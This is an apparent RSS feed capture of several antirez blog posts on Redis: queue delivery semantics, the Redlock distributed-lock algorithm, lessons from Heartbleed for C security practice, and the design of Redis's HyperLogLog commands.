There is always time to improve and fix our implementation and designs, but focusing too much on how we would like some software to be, has the risk of putting it in the vaporware category for far longer than needed. It’s time to let it go. Enjoy Redis Cluster!

Redis Cluster RC1 is available both as '3.0.0-rc1' tag at Github, or as a tarball in the Redis.io download page at http://redis.io/download Comments]]>
http://antirez.com/news/79
Queues and databases http://antirez.com/news/78 http://antirez.com/news/78 Mon, 14 Jul 2014 09:53:34 +0000
Technically speaking we can think at queues as a form of inter-process messaging primitive, where the receiving process needs to acknowledge the reception of the message. Messages can not be fire-and-forget, since the queue needs to understand if the message can be removed from the queue, so some form of acknowledgement is strictly required.

When receiving a message triggers the execution of a task, like it happens in the kind of queues we are talking about, the moment the message reception is acknowledged changes the semantic of the queue. When the worker process acknowledges the reception of the message *before* processing the message, if the worker fails the message can be lost before the task is performed at all. If the acknowledge is sent only *after* the message gets processed, if the worker fails or because of network partitions the queue may re-deliver the message again. This happens whatever the queue consistency properties are, so, even if the queue is modeled using a system providing strong consistency, the indetermination still holds true:

* If messages are acknowledged before processing, the queue will have an at-most-once delivery property. This means messages can be processed zero or one time.
* If messages are acknowledged after processing, the queue will have an at-least-once delivery property. This means messages can be processed from 1 to infinite number of times.

While both of this cases are not perfect, in the real world the second behavior is often preferred, since it is usually much simpler to cope with the case of multiple delivery of the message (triggering multiple executions of the task) than a system that from time to time does not execute a given task at all. An example of at-least-once delivery system is Amazon SQS (Simple Queue Service).

There is also a fundamental reason why at-least-once delivery systems are to be preferred, that has to do with distributed systems: the other semantics (at-most-once delivery) requires the queue to be strongly consistent: once the message is acknowledged no other worker must be able to acknowledge the same message, which is a strong property.

Once we move our focus to at-least-once delivery systems, we may notice that to model the queue with a CP system is a waste, and also a disadvantage:

* Anyway, we can’t guarantee more than at-least-once delivery.
* Our queue lose the ability to work into a minority side of a network partition.
* Because of the consistency requirements the queue needs agreement, so we are burning performances and adding latency without any good reason.

Since messages may be delivered multiple times, what we want conceptually is a commutative data structure and an eventually consistent system. Messages can be stored into a set data structure replicated into N nodes, with the merge function being the union among the sets. Acknowledges, received by workers after execution of messages, are also conceptually elements of the set, marking a given element as processed. This is a trivial example which is not particularly practical for a real world system, but shows how a given kind of queue is well modeled by a given set of properties of a distributed system.

Practically speaking there are other useful things our queue may try to provide:

* Guaranteed delivery to a single worker at least for a window of time: while multiple delivery is allowed, we want to avoid it as much as possible.
* Best-effort checks to avoid to re-delivery a message after a timeout if the message was already processed. Again, we can’t guarantee this property, but we may try hard to reduce re-issuing a message which was actually already processed.
* Enough internal state to handle, during normal operations, messages as a FIFO, so that messages arriving first are processed first.
* Auto cleanup of the internal data structures.

On top of this we need to retain messages during network partitions, so that conceptually (even if practically we could use different data structures) the set of messages to deliver are the union of all the messages of all the nodes.

Unfortunately while many Redis based queues implementations exist, no one try to use N Redis independent nodes and the offered primitives as a building block for a distributed system with such characteristics. Using Redis data structures and performances, and algorithms providing certain useful guarantees, may provide a queue system which is very practical to use, easy to administer and scale, while providing excellent performances (messages / second) per node.

Because I find the topic is interesting and this is an excellent use case for Redis, I’m very slowly working at a design for such a Redis based queue system. I hope to show something during the next weeks, time permitting. Comments]]>
http://antirez.com/news/78
A proposal for more reliable locks using Redis http://antirez.com/news/77 http://antirez.com/news/77 Fri, 16 May 2014 11:15:32 +0000 UPDATE: The algorithm is now described in the Redis documentation here => http://redis.io/topics/distlock. The article is left here in its older version, the updates will go into the Redis documentation instead.
-----------------

Many people use Redis to implement distributed locks. Many believe that this is a great use case, and that Redis worked great to solve an otherwise hard to solve problem. Others believe that this is totally broken, unsafe, and wrong use case for Redis.

Both are right, basically. Distributed locks are not trivial if we want them to be safe, and at the same time we demand high availability, so that Redis nodes can go down and still clients are able to acquire and release locks. At the same time a fast lock manager can solve tons of problems which are otherwise hard to solve in practice, and sometimes even a far from perfect solution is better than a very slow solution.

Can we have a fast and reliable system at the same time based on Redis? This blog post is an exploration in this area. I’ll try to describe a proposal for a simple algorithm to use N Redis instances for distributed and reliable locks, in the hope that the community may help me analyze and comment the algorithm to see if this is a valid candidate.

# What we really want?

Talking about a distributed system without stating the safety and liveness properties we want is mostly useless, because only when those two requirements are specified it is possible to check if a design is correct, and for people to analyze and find bugs in the design. We are going to model our design with just three properties, that are what I believe the minimum guarantees you need to use distributed locks in an effective way.

1) Safety property: Mutual exclusion. At any given moment, only one client can hold a lock.

2) Liveness property A: Deadlocks free. Eventually it is always possible to acquire a lock, even if the client that locked a resource crashed or gets partitioned.

3) Liveness property B: Fault tolerance. As long as the majority of Redis nodes are up, clients are able to acquire and release locks.

# Distributed locks, the naive way.

To understand what we want to improve, let’s analyze the current state of affairs.

The simple way to use Redis to lock a resource is to create a key into an instance. The key is usually created with a limited time to live, using Redis expires feature, so that eventually it gets released one way or the other (property 2 in our list). When the client needs to release the resource, it deletes the key.

Superficially this works well, but there is a problem: this is a single point of failure in our architecture. What happens if the Redis master goes down?
Well, let’s add a slave! And use it if the master is unavailable. This is unfortunately not viable. By doing so we can’t implement our safety property of the mutual exclusion, because Redis replication is asynchronous.

This is an obvious race condition with this model:

1) Client A acquires the lock into the master.

2) The master crashes before the write to the key is transmitted to the slave.

3) The slave gets promoted to master.

4) Client B acquires the lock to the same resource A already holds a lock for. <- SAFETY VIOLATION!

Sometimes it is perfectly fine that under special circumstances, like during a failure, multiple clients can hold the lock at the same time.
If this is the case, stop reading and enjoy your replication based solution. Otherwise keep reading for a hopefully safer way to implement it.

# First, let’s do it correctly with one instance.

Before to try to overcome the limitation of the single instance setup described above, let’s check how to do it correctly in this simple case, since this is actually a viable solution in applications where a race condition from time to time is acceptable, and because locking into a single instance is the foundation we’ll use for the distributed algorithm described here.

To acquire the lock, the way to go is the following:

SET resource_name my_random_value NX PX 30000

The command will set the key only if it does not already exist (NX option), with an expire of 30000 milliseconds (PX option).
The key is set to a value “my_random_value”. This value requires to be unique across all the clients and all the locks requests.

Basically the random value is used in order to release the lock in a safe way, with a script that tells Redis: remove the key only if exists and the value stored at the key is exactly the one I expect to be. This is accomplished by the following Lua script:

if redis.call("get",KEYS[1]) == ARGV[1] then
return redis.call("del",KEYS[1])
else
return 0
end

This is important in order to avoid removing a lock that was created by another client. For example a client may acquire the lock, get blocked into some operation for longer than the lock validity time (the time at which the key will expire), and later remove the lock, that was already acquired by some other client.
Using just DEL is not safe as a client may remove the lock of another client. With the above script instead every lock is “signed” with a random string, so the lock will be removed only if it is still the one that was set by the client trying to remove it.

What this random string should be? I assume it’s 20 bytes from /dev/urandom, but you can find cheaper ways to make it unique enough for your tasks.
For example a safe pick is to seed RC4 with /dev/urandom, and generate a pseudo random stream from that.
A simpler solution is to use a combination of unix time with microseconds resolution, concatenating it with a client ID, it is not as safe, but probably up to the task in most environments.

The time we use as the key time to live, is called the “lock validity time”. It is both the auto release time, and the time the client has in order to perform the operation required before another client may be able to acquire the lock again, without technically violating the mutual exclusion guarantee, which is only limited to a given window of time from the moment the lock is acquired.

So now we have a good way to acquire and release the lock. The system, reasoning about a non-distrubited system which is composed of a single instance, always available, is safe. Let’s extend the concept to a distributed system where we don’t have such guarantees.

# Distributed version

In the distributed version of the algorithm we assume to have N Redis masters. Those nodes are totally independent, so we don’t use replication or any other implicit coordination system. We already described how to acquire and release the lock safely in a single instance. We give for granted that the algorithm will use this method to acquire and release the lock in a single instance. In our examples we set N=5, which is a reasonable value, so we need to run 5 Redis masters in different computers or virtual machines in order to ensure that they’ll fail in a mostly independent way.

In order to acquire the lock, the client performs the following operations:

Step 1) It gets the current time in milliseconds.

Step 2) It tries to acquire the lock in all the N instances sequentially, using the same key name and random value in all the instances.

During the step 2, when setting the lock in each instance, the client uses a timeout which is small compared to the total lock auto-release time in order to acquire it.
For example if the auto-release time is 10 seconds, the timeout could be in the ~ 5-50 milliseconds range.
This prevents the client to remain blocked for a long time trying to talk with a Redis node which is down: if an instance is not available, we should try to talk with the next instance ASAP.

Step 3) The client computes how much time elapsed in order to acquire the lock, by subtracting to the current time the timestamp obtained in step 1.
If and only if the client was able to acquire the lock in the majority of the instances (at least 3), and the total time elapsed to acquire the lock is less than lock validity time, the lock is considered to be acquired.

Step 4) If the lock was acquired, its validity time is considered to be the initial validity time minus the time elapsed, as computed in step 3.

Step 5) If the client failed to acquire the lock for some reason (either it was not able to lock N/2+1 instances or the validity time is negative), it will try to unlock all the instances (even the instances it believe it was not able to lock).

# Synchronous or not?

Basically the algorithm is partially synchronous: it relies on the assumption that while there is no synchronized clock across the processes, still the local time in every process flows approximately at the same rate, with an error which is small compared to the auto-release time of the lock. This assumption closely resembles a real-world computer: every computer has a local clock and we can usually rely on different computers to have a clock drift which is small.

Moreover we need to refine our mutual exclusion rule: it is guaranteed only as long as the client holding the lock will terminate its work within the lock validity time (as obtained in step 3), minus some time (just a few milliseconds in order to compensate for clock drift between processes).

# Retry

When a client is not able to acquire the lock, it should try again after a random delay in order to try to desynchronize multiple clients trying to acquire the lock, for the same resource, at the same time (this may result in a split brain condition where nobody wins). Also the faster a client will try to acquire the lock in the majority of Redis instances, the less window for a split brain condition (and the need for a retry), so ideally the client should try to send the SET commands to the N instances at the same time using multiplexing.

It is worth to stress how important is for the clients that failed to acquire the majority of locks, to release the (partially) acquired locks ASAP, so that there is no need to wait for keys expiry in order for the lock to be acquired again (however if a network partition happens and the client is no longer able to communicate with the Redis instances, there is to pay an availability penalty and wait for the expires).

# Releasing the lock

Releasing the lock is simple and involves just to release the lock in all the instances, regardless of the fact the client believe it was able to successfully lock a given instance.

# Safety arguments

Is this system safe? We can try to understand what happens in different scenarios.

To start let’s assume that a client is able to acquire the lock in the majority of instances. All the instances will contain a key with the same time to live. However the key was set at different times, so the keys will also expire at different times. However if the first key was set at worst at time T1 (the time we sample before contacting the first server) and the last key was set at worst at time T2 (the time we obtained the reply from the last server), we are sure that the first key to expire in the set will exist for at least MIN_VALIDITY=TTL-(T2-T1)-CLOCK_DRIFT. All the other keys will expire later, so we are sure that the keys will be simultaneously set for at least this time.

During the time the majority of keys are set, another client will not be able to acquire the lock, since N/2+1 SET NX operations can’t succeed if N/2+1 keys already exist. So if a lock was acquired, it is not possible to re-acquire it at the same time (violating the mutual exclusion property).

However we want to also make sure that multiple clients trying to acquire the lock at the same time can’t simultaneously succeed.

If a client locked the majority of instances using a time near, or greater, than the lock maximum validity time (the TTL we use for SET basically), it will consider the lock invalid and will unlock the instances, so we only need to consider the case where a client was able to lock the majority of instances in a time which is less than the validity time. In this case for the argument already expressed above, for MIN_VALIDITY no client should be able to re-acquire the lock. So multiple clients will be albe to lock N/2+1 instances at the same time (with “time" being the end of Step 2) only when the time to lock the majority was greater than the TTL time, making the lock invalid.

Are you able to provide a formal proof of safety, or to find a bug? That would be very appreciated.

# Liveness arguments

The system liveness is based on three main features:

1) The auto release of the lock (since keys expire): eventually keys are available again to be locked.

2) The fact that clients, usually, will cooperate removing the locks when the lock was not acquired, or when the lock was acquired and the work terminated, making it likely that we don’t have to wait for keys to expire to re-acquire the lock.

3) The fact that when a client needs to retry a lock, it waits a time which is comparable greater to the time needed to acquire the majority of locks, in order to probabilistically make split brain conditions during resource contention unlikely.

However there is at least a scenario where a very special network partition/rejoin pattern, repeated indefinitely, may violate the system availability.
For example with N=5, two clients A and B may try to lock the same resource at the same time, nobody will be able to acquire the majority of locks, but they may be able to lock the majority of nodes if we sum the locks of A and B (for example client A locked 2 instances, client B just one instance).
Then the clients are partitioned away before they can unlock the locked instances. This will leave the resource not lockable for a time roughly equal to the auto release time. Then when the keys expire, the two clients A and B join again the partition repeating the same pattern, and so forth indefinitely.

Another point of view to see the problem above, is that we pay an availability penalty equal to “TTL” time on network partitions, so if there are continuous partitions, we can pay this penalty indefinitely.

I can’t find a simple way to have guaranteed liveness (but did not tried very hard honestly), but the worst case appears to be hard to trigger.
Basically it means that we can only provide, using this algorithm, an approximation of Property number 2.

# Performance, crash-recovery and fsync

Many users using Redis as a lock server need high performance in terms of both latency to acquire and release a lock, and number of acquire / release operations that it is possible to perform per second. In order to meet this requirement, the strategy to talk with the N Redis servers to reduce latency is definitely multiplexing (or poor’s man multiplexing, which is, putting the socket in non-blocking mode, send all the commands, and read all the commands later, assuming that the RTT between the client and each instance is similar).

However there is another consideration to do about persistence if we want to target a crash-recovery system model.

Basically to see the problem here, let’s assume we configure Redis without persistence at all. A client acquires the lock in 3 of 5 instances. One of the instances where the client was able to acquire the lock is restarted, at this point there are again 3 instances that we can lock for the same resource, and another client can lock it again, violating the safety property of exclusivity of lock.

If we enable AOF persistence, things will improve quite a bit. For example we can upgrade a server by sending SHUTDOWN and restarting it. Because Redis expires are semantically implemented so that virtually the time still elapses when the server is off, all our requirements are fine.
However everything is fine as long as it is a clean shutdown. What about a power outage? If Redis is configured, as by default, to fsync on disk every second, it is possible that after a restart our key is missing. Long story short if we want to guarantee the lock safety in the face of any kind of instance restart, we need to enable fsync=always in the persistence setting. This in turn will totally ruin performances to the same level of CP systems that are traditionally used to implement distributed locks in a safe way.

The good news is that because in our algorithm we don’t stop to acquire locks as soon as we reach the majority of the servers, the actual probability of safety violation is small, because most of the times the lock will be hold in all the 5 servers, so even if one restarts without a key, it is practically unlikely (but not impossible) that an actual safety violation happens. Long story short, this is an user pick, and a big trade off. Given the small probability for a race condition, if it is acceptable that with an extremely small probability, after a crash-recovery event, the lock may be acquired at the same time by multiple clients, the fsync at every operation can (and should) be avoided.

# Reference implementation

I wrote a simple reference implementation in Ruby, backed by redis-rb, here: http://github.com/antirez/redlock-rb

# Want to help?

If you are into distributed systems, it would be great to have your opinion / analysis.
Also reference implementations in other languages could be great.

Thanks in advance!

EDIT: I received feedbacks in this blog post comment and via Hacker News that's worth to incorporate in this blog post.

1) As Steven Benjamin notes in the comments below, if after restarting an instance we can make it unavailable for enough time for all the locks that used this instance to expire, we don't need fsync. Actually we don't need any persistence at all, so our safety guarantee can be provided with a pure in-memory configuration.

An example: previously we described the example race condition where a lock is obtained in 3 servers out of 5, and one of the servers where the lock was obtained restarts empty: another client may acquire the same lock by locking this server and the other two that were not locked by the previous client. However if the restarted server is not available for queries enough time for all the locks that were obtained with it to expire, we are guaranteed this race is no longer possible.

2) The Hacker News user eurleif noticed how it is possible to reacquire the lock as a strategy if the client notices it is taking too much time in order to complete the operation. This can be done by just extending an existing lock, sending a script that extends the expire of the value stored at the key is the expected one. If there are no new partitions, and we try to extend the lock enough in advance so that the keys will not expire, there is the guarantee that the lock will be extended.

3) The Hacker News user mjb noted how the term "skew" is not correct to describe the difference of the rate at which different clocks increment their local time, and I'm actually talking about "Drift". I'm replacing the word "skew" with "drift" to use the correct term.

Thanks for the very useful feedbacks. Comments]]>
http://antirez.com/news/77
Using Heartbleed as a starting point http://antirez.com/news/76 http://antirez.com/news/76 Thu, 10 Apr 2014 09:06:18 +0000
However sometimes in the morning I read the code I wrote the night before and I’m deeply embarrassed. Programmers sometimes fail, I for sure do often, so my guess is that what is needed is a different process, and not a different OpenSSL team.

There is who proposes a different language safer than C, and who proposes that the specification is broken because it is too complex. Probably there is some truth in both arguments, however it is unlikely that we move to a different specification or system language soon, so the real question is, what we can do now to improve system software security?

1) Throw money at it.

Making system code safer is simple if there are investments. If different companies hire security experts to do code auditings in the OpenSSL code base, what happens is that the probability of discovering a bug like heartbleed is greater.

I’ve seen very complex bugs that are triggered by a set of non-trivial conditions being discovered by serious code auditing efforts. A memcpy() without bound checks is something that if you analyze the code security-wise, will stand out in the first read. And guess how heartbleed was discovered? Via security auditings performed at Google.

Probably the time to consider open source something that mostly we take from is over. Many companies should follow the example of Google and other companies, using workforce for OSS software development and security.

2) Static and dynamic checks.

Static code analysis is, as a side effect, a semi-automated way to do code auditings.
In critical system code like OpenSSL even to do some source code annotation or use a set of rules to make static analysis more effective is definitely acceptable.

Static tools today are not a total solution, but the output of a static analysis if carefully inspected by an expert programmer can provide some value.

Another great help comes from dynamic checks like Valgrind. Every system software written in C should be tested using Valgrind automatically at every new commit.

3) Abstract C with libraries.

C is low level and has no built in safety in the language. However something good about C is that it is a language that allows to build layers on top of its rawness.

A sane dynamic string library prevents a lot of buffer overflow issues, and today almost every decent project is using one. However there is more you can do about it. For example for security critical code where memory can contain things like private keys, you can augment your dynamic string library with memory copy primitives that only copy from one buffer to the other performing implicit sanity checks.

Moreover if a buffer contains critical data, you can set logical permissions so that trying to copy from this area aborts the program. There are other less-portable ways using memory management to protect important memory pages in an even more effective ways, however an higher C-level protection can be much simpler in the real-world because of portability / predictability concerns.

In general many things can be explored to avoid using C without protections, creating a library that abstracts on top of it to make programming safer.

4) Randomized tests.

Unit tests are unlikely to trigger edge cases and failed sanity checks.
There is a class of tests that is known since decades that is, in my opinion, not used enough: fuzzy testing.

The OpenSSL bug was definitely discoverable by sending different kind of OpenSSL packets with different randomized parameters, in conjunction with dynamic analysis tools like Valgrind.

In my experience having a great deal of randomized tests together with an environment where the same tests are ran again and again with the program running over Valgrind, can discover a number of real-world bugs that gets otherwise unnoticed. There are many models to explore, usually you want something that injects totally random data, and intermediate models where valid packets are corrupted in different random ways.

A typical example of this technique is the old DNS compression infinite-loop bug. Trow a few random packets to a naive implementation and you’ll find it in a matter of minutes.

5) Change of mentality about security vs performance.

It is interesting that OpenSSL is doing its own allocation caching stuff because in some systems malloc/free is slow. This is a sign that still performances, even in security critical code, is regarded with too much respect over safety. In this specific instance, it must be admitted that probably when the OpenSSL developers wrapped malloc, they never though of security implications by doing so. However the fact that they cared about a low-level detail like the allocation functions in *some* system is a sign of deep concerns about performances, while they should be more deeply concerned about the correctness / safety of the system.

In general it does not help the fact that the system that is the de facto standard in today’s servers infrastructure, that is, Linux, has had, and still has, one of the worst allocators you will find around, mostly for licensing concerns, since the better allocators are not GPL but BSD licensed.

Probably yet another area where big corps should contribute, by providing significant improvements to glibc malloc. Glibc malloc is, even if better alternatives are available, what many real-world system softwares are going to use anyway.

I would love to see the discussion about heartbleed to take a more pragmatic approach, because one thing is guaranteed: to blame here or there will not change the actual level of the security of OpenSSL or anything else, and there are new challenges in the future. For example the implementation of HTTP/2.0 may be a very delicate moment security wise.

EDIT: Actually I was not right and the malloc implementation inside the Glibc is BSD licensed, so it is not a license issue. I don't know why the Glibc is not using Jemalloc instead that is very good and actively developed allocator. Comments]]>
http://antirez.com/news/76
Redis new data structure: the HyperLogLog http://antirez.com/news/75 http://antirez.com/news/75 Tue, 01 Apr 2014 08:16:35 +0000
Counting unique things
===

Usually counting unique things, for example the number of unique IPs that connected today to your web site, or the number of unique searches that your users performed, requires to remember all the unique elements encountered so far, in order to match the next element with the set of already seen elements, and increment a counter only if the new element was never seen before.

This requires an amount of memory proportional to the cardinality (number of items) in the set we are counting, which is, often absolutely prohibitive.

There is a class of algorithms that use randomization in order to provide an approximation of the number of unique elements in a set using just a constant, and small, amount of memory. The best of such algorithms currently known is called HyperLogLog, and is due to Philippe Flajolet.

HyperLogLog is remarkable as it provides a very good approximation of the cardinality of a set even using a very small amount of memory. In the Redis implementation it only uses 12kbytes per key to count with a standard error of 0.81%, and there is no limit to the number of items you can count, unless you approach 2^64 items (which seems quite unlikely).

The algorithm is documented in the original paper [1], and its practical implementation and variants were covered in depth by a 2013 paper from Google [2].

[1] http://algo.inria.fr/flajolet/Publications/FlFuGaMe07.pdf
[2] http://static.googleusercontent.com/media/research.google.com/en//pubs/archive/40671.pdf

How it works?
===

There are plenty of wonderful resources to learn more about HyperLogLog, such as [3].

[3] http://blog.aggregateknowledge.com/2012/10/25/sketch-of-the-day-hyperloglog-cornerstone-of-a-big-data-infrastructure/

Here I’ll cover only the basic idea using a very clever example found at [3]. Imagine you tell me you spent your day flipping a coin, counting how many times you encountered a non interrupted run of heads. If you tell me that the maximum run was of 3 heads, I can imagine that you did not really flipped the coin a lot of times. If instead your longest run was 13, you probably spent a lot of time flipping the coin.

However if you get lucky and the first time you get 10 heads, an event that is unlikely but possible, and then stop flipping your coin, I’ll provide you a very wrong approximation of the time you spent flipping the coin. So I may ask you to repeat the experiment, but this time using 10 coins, and 10 different piece of papers, one per coin, where you record the longest run of heads. This time since I can observe more data, my estimation will be better.

Long story short this is what HyperLogLog does: it hashes every new element you observe. Part of the hash is used to index a register (the coin+paper pair, in our previous example. Basically we are splitting the original set into m subsets). The other part of the hash is used to count the longest run of leading zeroes in the hash (our run of heads). The probability of a run of N+1 zeroes is half the probability of a run of length N, so observing the value of the different registers, that are set to the maximum run of zeroes observed so far for a given subset, HyperLogLog is able to provide a very good approximated cardinality.

The Redis implementation
===

The standard error of HyperLogLog is 1.04/sqrt(m), where “m” is the number of registers used.
Redis uses 16384 registers, so the standard error is 0.81%.

Since the hash function used in the Redis implementation has a 64 bit output, and we use 14 bits of the hash output in order to address our 16k registers, we are left with 50 bits, so the longest run of zeroes we can encounter will fit a 6 bit register. This is why a Redis HyperLogLog value only uses 12k bytes for 16k registers.

Because of the use of a 64 bit output function, which is one of the modifications of the algorithm that Google presented in [2], there are no practical limits to the cardinality of the sets we can count. Moreover it is worth to note that the error for very small cardinalities tend to be very small. The following graph shows a run of the algorithm against two different large sets. The cardinality of the set is shown in the x axis, while the relative error (in percentage) in the y axis.

img://antirez.com/misc/hll_1.png

The red and green lines are two different runs with two totally unrelated sets. It shows how the error is consistent as the cardinality increases. However for much smaller cardinalities, you can enjoy a much smaller error:

img://antirez.com/misc/hll_2.png

The green line shows the error of a single run up to cardinality 100, while the red line is the maximum error found in 100 runs. Up to a cardinality of a few hundreds the algorithm is very likely to make a very small error or to provide the exact answer. This is very valuable when the computed value is shown to an user that can visually match if the answer is correct.

The source code of the Redis implementation is available at Github:

https://github.com/antirez/redis/blob/unstable/src/hyperloglog.c

The API
===

From the point of view of Redis an HyperLogLog is just a string, that happens to be exactly 12k + 8 bytes in length
(12296 bytes to be precise). All the HyperLogLog commands will happily run if called with a String value exactly of this size, or will report an error. However all the calls are safe whatever is stored in the string: you can store garbage and still ask for an estimation of the cardinality. In no case this will make the server crash.

Also everything in the representation is endian neutral and is not affected by the processor word size, so a 32 bit big endian processor can read the HLL of a 64 bit little endian processor.

The fact that HyperLogLogs are strings avoided the introduction of an actual type at RDB level. This allows the work to be back ported into Redis 2.8 in the next days, so you’ll be able to use HyperLogLogs ASAP. Moreover the format is automatically serialized, and can be retrieved and restored easily.

The API is constituted of three new commands:

PFADD var element element … element
PFCOUNT var
PFMERGE dst src src src … src

The commands prefix is “PF” in honor of Philippe Flajolet [4].

[4] http://en.wikipedia.org/wiki/Philippe_Flajolet

PFADD adds elements to the HLL stored at “var”. If the variable does not exist, an empty HLL is automatically created as it happens always with Redis API calls. The command is variadic, so allows for very aggressive pipelining and mass insertion.

The command returns 1 if the underlying HyperLogLog was modified, otherwise 0 is returned.
This is interesting for the user since as we add elements the probability of an element actually modifying some register decreases. The fact that the API is able to provide hints about the fact that a new cardinality is available allows for programs that continuously add elements and retrieve the approximated cardinality only when a new one is available.

PFCOUNT returns the estimated cardinality, which is zero if the key does not exist.

Finallly PFMERGE can merge N different HLL values into one. The resulting HLL will report an estimated cardinality that is the cardinality of the union of the different sets that we counted with the different HLL values.
This seems magical but works because HLL while randomized is fully deterministic, so PFMERGE just takes, for every register, the maximum value available across the N HLL values. A given element hashes to the same register with the same run of zeroes always, so the merge performed in this way will only add the count of the elements that are not common to the different HLLs.

As you can see HyperLogLog is fully parallelizable, since it is possible to split a set into N subsets counted independently to later merge the values and obtain the total cardinality approximation. The fact that HLLs in Redis are just strings helps to move HLL values across instances.

First make it correct, then make it fast
===

Redis HHLs are composed of 16k registers packed into 6 bit integers. This creates several performance issues that must be solved in order to provide an API of commands that can be called without thinking too much.

One problem is that accessing to registers require accessing multiple bytes, shifting, and masking in order to retrieve the correct 6 bit value. This is not a big problem for PFADD that only touches a register for every element, but PFCOUNT needs to perform a computation using all the 16k registers, so if there are non trivial constant times to access every single register, the command risks to be slow. Moreover, while accessing the registers, we need to compute the sum of pow(2,-register) which involves floating point math.

One may feel the temptation of using full bytes instead of 6 bit integers in order to speedup the computation, however this would be a shame since every HLL would use 16k instead of 12k that is a non trivial difference, so this route was discarded at the beginning. The command was optimized for a speedup of about 3 times compared to the initial implementation by doing the following changes:

* For m=16k which is the Redis default (the implementation is more generic and could theoretically work with different values) the implementation selects a fast-path with unrolled loops accessing 16 register at every time. The registers are accessed using fixed offsets / shifts / masks (via some pointer that is incremented 12 bytes at the next iteration).
* The floating point computation was modified in order to allow for multiple operations to be performed in parallel when possible. This was just a matter of adding parens. Floating point math is not commutative, but in this case there was no loss of precision.
* The pow(2,-register) term was precomputed in a lookup table.

With the 3x speedup provided by the above changes the command was able to perform about 60k calls per second in a fast hardware. However this is still far from the hundreds thousands calls possible with commands that are, from the user point of view, conceptually similar, like SCARD.

Instead of optimizing the computation of the approximated cardinality further, there was a simpler solution. Basically the output of the algorithm only changes if some register changes. However as already observed above, most of the PFADD calls don’t result in any register changed. This basically means that it is possible to cache the last output and recompute it only if some register changes.

So our data structure has an additional tail of 8 bytes representing a 64bit unsigned integer in little endian format. If the most significant bit is set, then the precomputed value is stale and requires to be recomputed, otherwise PFCOUNT can use it as it is. PFADD just turns on the “invalid cache” bit when some register is modified.

After this change even trying to add elements at maximum speed using a pipeline of 32 elements with 50 simultaneous clients, PFCOUNT was able to perform as well as any other O(1) command with very small constant times.

Bias correction using polynomial regression
===

The HLL algorithm, in order to be practical, must work equally well in any cardinality range. Unfortunately the raw estimation performed by the algorithm is not very good for cardinalities less than m*2.5 (around 40000 elements for m=16384) since in this range the algorithm outputs biased or even results with larger errors depending on the exact range.

The original HLL paper [1] suggests switching to Linear Counting [5] when the raw cardinality estimated by the first part of the HLL algorithm is less than m*2.5.

[5] http://dblab.kaist.ac.kr/Publication/pdf/ACM90_TODS_v15n2.pdf

Linear counting is a different cardinality estimator that uses a simple concept. We have a bitmap of N bits. Every time a new element must be counted, it is hashed, and the hash is used in order to index a random bit inside the bitmap, that is turned to 1. The number of unset bits in the bitmap gives an idea of how many elements we added so far using the following formula:

cardinality = m*log(m/ez);

Where ‘ez’ is the number of zero bits and m is the total number of bits in the bitmap.

Linear counting does not work well for large cardinalities compared to HyperLogLog, but works very well for small cardinalities. Since the HLL registers as a side effect also work as a linear counting bitmap, counting the number of zero registers it is possible to apply linear counting for the range where HLL does not perform well. Note that this is possible because when we update the registers, we don’t really use the longest run of zeroes, but the longest run of zeroes plus one. This means that if an element is added and it is addressing a register that was never addressed, the register will turn from 0 to a different value (at least 1).

The problem with linear counting is that as the cardinality gets bigger, its output error gets larger, so we need to switch to HLL ASAP. However when we switch at 2.5m, HLL is still biased. In the following image the same cardinality was tested with 1000 different sets, and the error of each run is reported as a point:

img://antirez.com/misc/hll_3.png

The blu line is the average of the error. As you can see before a cardinality of 40k, where linear counting is used, the more we go towards greater cardinalities, the more the points “beam” gets larger (bigger errors). When we switch to HLL raw estimate the error is smaller, but there is a bias: the algorithm overestimates the cardinality in the range 40k-80k.

Google engineers studied this problem extensively [2] in order to correct the bias. Their solution was to create an empirical table of cardinality values and the corresponding biases. Their modified algorithm uses the table and interpolation in order to get the bias in a given range, and correct accordingly.

I used a different approach: you can see that the bias is not random but looks like a very smooth curve, so I calculated a few cardinality-bias samples and performed polynomial regression in order to find a polynomial approximating the curve.

Currently I’m using a four order polynomial to correct in the range 40960-72000, and the following is the result after the bias correction:

img://antirez.com/misc/hll_4.png

While there is still some bias at the switching point between the two algorithms, the result is quite satisfying compared to the vanilla HLL algorithm, however it is probably possible to use a curve that fits better the bias curve. I had no time to investigate this further.

It is worth to note that during my investigations I found that, when no bias correction is used, and at least for m=16384, the best value to switch from linear counting to raw HLL estimate is actually near 3 and not 2.5 as mentioned in [1], since a value of 3 both improves bias and error. Values larger than 3 will improve the bias (a value of 4 completely corrects it) but will have bad effects on the error.

The original HLL algorithm also corrects for values towards 2^32 [1][2] since once we approach very large values collisions in the hash function starts to be an issue. We don’t need such correction since we use a 64 bit hash function and 6 bits counters, which is one of the modifications proposed by Google engineers [2] and adopted by the Redis implementation.

Future work
===

Intuitively it seems like it is possible to improve the error of the algorithm output when linear counting is used by exploiting the additional informations we have. In the standard linear counting algorithm the registers are just 1 bit wide, so we have only two informations: if an element so far hashed to this bit or not. Still the HLL algorithm as proposed initially [1] and as modified at Google [2], when reverting to linear counting still only use the number of zero registers as the input of the algorithm. It is possible that also using the information stored in the registers could improve the output.

For example in standard linear counting, assuming we have 10 bits, I may add 5 elements that all happen to address the same bit. This is an odd case that the algorithm has no way to correct, and the estimation provided will likely be smaller than the actual cardinality. However in the linear counting algorithm used by HLL in a similar situation we may found that the value at the only register set is an hint about multiple elements colliding there, allowing a correction of the output.

Conclusion
===

HyperLogLog is an amazing data structure. My hope is that the Redis implementation, that will be available in a stable release in a matter of days (Redis 2.8.9 will include it), will provide this tool in a ready to use form to many programmers.

The HN post is here: https://news.ycombinator.com/item?id=7506774 Comments]]>
http://antirez.com/news/75
Fascinating little programs http://antirez.com/news/74 http://antirez.com/news/74 Thu, 13 Mar 2014 22:32:59 +0000 I was trying to merge a few pull requests, to fix issues, and doing some refactoring at the same time. It was some kind of nirvana I was feeling: a complete control of small, self-contained, and useful code.

There is something special in simple code. Here I’m not referring to simplicity to fight complexity or over engineering, but to simplicity per se, auto referential, without goals if not beauty, understandability and elegance.

After all the programming world has always been fascinated with small programs. For decades programmers challenged in 1k or 4k contexts, from the 6502 assembler to today’s javascript contests.
Even the obfuscated C contest, after all, has a big component in the minimalism.

